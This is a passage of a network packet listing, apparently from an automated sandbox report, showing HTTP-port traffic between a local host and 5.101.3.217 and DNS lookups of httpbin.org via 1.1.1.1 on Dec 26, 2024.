Dec 26, 2024 14:14:23.538049936 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:23.538058996 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:23.538196087 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:23.538908005 CET | 49731 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:23.575164080 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:23.575232983 CET | 49731 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:23.655812979 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:23.655905962 CET | 49731 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:23.656056881 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:23.656100988 CET | 49731 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:23.656124115 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:23.656147957 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:23.656167984 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:23.656275034 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:23.656282902 CET | 49731 | 80 | 192.168.2.4 | 5.101.3.217
                                                    Dec 26, 2024 14:14:23.656315088 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.656404018 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.656501055 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.656575918 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.656625032 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.656758070 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.656831980 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.656970978 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.657015085 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.657160044 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.657176018 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.658502102 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.658519983 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.658623934 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.658637047 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.658751965 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.658761978 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.658808947 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.658818960 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.658915043 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.658924103 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.658952951 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.658987045 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.659040928 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.659075022 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.659149885 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.659159899 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.659235001 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.659244061 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.659328938 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.659339905 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.659379959 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.659396887 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.659446955 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.659495115 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.659590960 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.659600973 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.659625053 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.659643888 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.659691095 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.659771919 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.659854889 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.659872055 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.659921885 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.660062075 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.660152912 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.660164118 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.660172939 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.660181999 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.660249949 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.660279989 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.660289049 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.660299063 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.660367012 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.660377026 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.671647072 CET4973180192.168.2.45.101.3.217
                                                    Dec 26, 2024 14:14:23.671720982 CET4973180192.168.2.45.101.3.217
                                                    Dec 26, 2024 14:14:23.694770098 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.694839001 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.775399923 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.775420904 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.775628090 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.775736094 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.775842905 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.775852919 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.776057005 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.776345015 CET4973180192.168.2.45.101.3.217
                                                    Dec 26, 2024 14:14:23.776424885 CET4973180192.168.2.45.101.3.217
                                                    Dec 26, 2024 14:14:23.791215897 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.791501045 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.791511059 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.791570902 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.791627884 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.791790009 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.791882992 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.791929960 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.792054892 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.792064905 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.792109013 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.792121887 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.792144060 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.792201996 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.792231083 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.792267084 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.792319059 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.792355061 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.792412996 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.792423010 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.792534113 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.792543888 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.792582035 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.792592049 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.792754889 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.792763948 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.792845011 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.792918921 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.792931080 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.792941093 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.793061018 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.793160915 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.793210030 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.793220043 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.793236017 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.793267965 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.793363094 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.793373108 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.793412924 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.793489933 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.793565989 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.793576002 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.793637991 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.793776035 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.793790102 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.793802023 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.793853998 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.793870926 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.793965101 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.793975115 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.794080973 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.794111013 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.794218063 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.794296026 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.806195021 CET4973180192.168.2.45.101.3.217
                                                    Dec 26, 2024 14:14:23.806265116 CET4973180192.168.2.45.101.3.217
                                                    Dec 26, 2024 14:14:23.895924091 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.895983934 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.896004915 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.896023035 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.896105051 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.896115065 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.896184921 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.896250010 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.896260023 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.896301985 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.896424055 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.896446943 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.896572113 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.896585941 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.896692991 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.896764040 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.896775961 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.896850109 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.896867990 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.896878958 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.897020102 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.897079945 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.897089958 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.897099018 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.897124052 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.897181034 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.897192955 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.897217035 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.897253036 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.897340059 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.897349119 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.897418976 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.897428036 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.897483110 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.897495031 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.897584915 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.897603989 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.897650003 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.897715092 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.897751093 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.897799015 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.897836924 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.897845984 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.897929907 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.897941113 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.897973061 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.898015976 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.898070097 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.898081064 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.898190022 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.898199081 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.898272038 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.898436069 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.898458958 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.900192022 CET4973180192.168.2.45.101.3.217
                                                    Dec 26, 2024 14:14:23.925829887 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.925842047 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.925885916 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.925895929 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.925975084 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.925985098 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.926008940 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.926103115 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.926114082 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.926183939 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.926213980 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.926230907 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.926281929 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.926353931 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.926394939 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.926484108 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.926531076 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.926539898 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.926578045 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.926587105 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.926629066 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.926640034 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.926678896 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.926714897 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.926809072 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.926817894 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.926929951 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.926939011 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.926970959 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.927048922 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.927058935 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.927068949 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.927170992 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.927185059 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.927304983 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.927323103 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.927421093 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.927431107 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.927536964 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.927546024 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.927627087 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.927635908 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.927758932 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.927787066 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.927804947 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.927814960 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.927853107 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.927880049 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.927927017 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.927936077 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.927988052 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.927997112 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.928076029 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:23.928086042 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:24.019982100 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:24.019998074 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:24.020009995 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:24.020080090 CET80497315.101.3.217192.168.2.4
                                                    Dec 26, 2024 14:14:24.020148039 CET80497315.101.3.217192.168.2.4
Dec 26, 2024 14:14:24.020231962 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:24.020315886 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:24.020324945 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:24.020339966 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:24.020440102 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:24.020533085 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:24.020576954 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:24.020675898 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:24.020685911 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:24.020714045 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:24.020724058 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:24.020853043 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:24.020893097 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:24.021014929 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:24.021024942 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:24.021121025 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:24.021131039 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:24.021235943 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:24.021245956 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:24.021289110 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:24.021303892 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:24.021369934 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:24.021429062 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:24.021440029 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:24.021562099 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:24.021574020 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:24.021584988 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:24.021677017 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:24.021717072 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:24.021728039 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:24.021879911 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:24.021891117 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:26.518847942 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:26.519031048 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:26.519148111 CET | 49731 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:26.522120953 CET | 49731 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:26.641572952 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:26.925182104 CET | 49732 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:27.044765949 CET | 80 | 49732 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:27.044914961 CET | 49732 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:27.045270920 CET | 49732 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:27.164745092 CET | 80 | 49732 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:28.560333967 CET | 80 | 49732 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:28.560388088 CET | 80 | 49732 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:28.560439110 CET | 49732 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:28.560914040 CET | 49732 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:28.680497885 CET | 80 | 49732 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:28.750621080 CET | 49733 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:28.870201111 CET | 80 | 49733 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:28.870506048 CET | 49733 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:28.871701002 CET | 49733 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:28.991326094 CET | 80 | 49733 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:30.490881920 CET | 80 | 49733 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:30.491194010 CET | 80 | 49733 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:30.491213083 CET | 49733 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:30.491246939 CET | 49733 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:30.610800982 CET | 80 | 49733 | 5.101.3.217 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 26, 2024 14:14:16.727374077 CET | 54076 | 53 | 192.168.2.4 | 1.1.1.1
Dec 26, 2024 14:14:16.727482080 CET | 54076 | 53 | 192.168.2.4 | 1.1.1.1
Dec 26, 2024 14:14:17.023552895 CET | 53 | 54076 | 1.1.1.1 | 192.168.2.4
Dec 26, 2024 14:14:17.023569107 CET | 53 | 54076 | 1.1.1.1 | 192.168.2.4
Dec 26, 2024 14:14:21.574904919 CET | 54079 | 53 | 192.168.2.4 | 1.1.1.1
Dec 26, 2024 14:14:21.575146914 CET | 54079 | 53 | 192.168.2.4 | 1.1.1.1
Dec 26, 2024 14:14:22.210077047 CET | 53 | 54079 | 1.1.1.1 | 192.168.2.4
Dec 26, 2024 14:14:22.210150003 CET | 53 | 54079 | 1.1.1.1 | 192.168.2.4
Dec 26, 2024 14:14:26.786135912 CET | 54081 | 53 | 192.168.2.4 | 1.1.1.1
Dec 26, 2024 14:14:26.786174059 CET | 54081 | 53 | 192.168.2.4 | 1.1.1.1
Dec 26, 2024 14:14:26.923796892 CET | 53 | 54081 | 1.1.1.1 | 192.168.2.4
Dec 26, 2024 14:14:26.923815012 CET | 53 | 54081 | 1.1.1.1 | 192.168.2.4
Dec 26, 2024 14:14:28.612071991 CET | 54083 | 53 | 192.168.2.4 | 1.1.1.1
Dec 26, 2024 14:14:28.612154961 CET | 54083 | 53 | 192.168.2.4 | 1.1.1.1
Dec 26, 2024 14:14:28.749556065 CET | 53 | 54083 | 1.1.1.1 | 192.168.2.4
Dec 26, 2024 14:14:28.749574900 CET | 53 | 54083 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 26, 2024 14:14:16.727374077 CET | 192.168.2.4 | 1.1.1.1 | 0xd9c2 | Standard query (0) | httpbin.org | A (IP address) | IN (0x0001) | false
Dec 26, 2024 14:14:16.727482080 CET | 192.168.2.4 | 1.1.1.1 | 0x9df4 | Standard query (0) | httpbin.org | 28 | IN (0x0001) | false
